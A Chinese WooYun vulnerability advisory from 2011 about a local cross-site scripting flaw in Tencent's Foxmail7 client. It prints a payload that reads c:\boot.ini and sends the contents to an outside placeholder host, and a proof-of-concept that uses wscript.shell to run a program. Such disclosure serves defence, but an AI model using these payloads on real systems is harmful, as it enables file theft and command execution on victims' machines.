当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02934

漏洞标题:Foxmail7 本地跨站,可能执行任意系统命令

相关厂商:腾讯

漏洞作者: mog

提交时间:2011-10-03 15:25

修复时间:2011-11-02 15:26

公开时间:2011-11-02 15:26

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-10-03: 细节已通知厂商并且等待厂商处理中
2011-10-03: 厂商已经确认,细节仅向厂商公开
2011-10-13: 细节向核心白帽子及相关领域专家公开
2011-10-23: 细节向普通白帽子公开
2011-11-02: 细节向实习白帽子公开
2011-11-02: 细节向公众公开

简要描述:

Foxmail7 存在本地跨站,可偷取任意文件,执行任意系统命令

详细说明:

发送原始邮件,内容包括跨站语句,可以本地权限执行javascript,如读取本地文件

<img src=# onerror='var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");XmlHttp.Open("get", "c:\boot.ini",true);XmlHttp.send(null);location="http://www.xxxx.com/?"+XmlHttp.responsetext;' />


可盗取任意文件内容

漏洞证明:

<html>
<title>poc</title>
<body>
test
<img height=0 width=0 src=# onerror='try{var s=new ActiveXObject("wscript.shell");s.Run("notepad.exe");}catch(e){window.open(document.URL)}' />
</body>
</html>


以上代码可能执行任意命令




这个POC似乎只能攻击没什么安全意识的人

修复方案:

禁止javascript执行,应该会好点

版权声明:转载请注明来源 mog@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:19

确认时间:2011-10-03 20:39

厂商回复:

thx!

最新状态:

暂无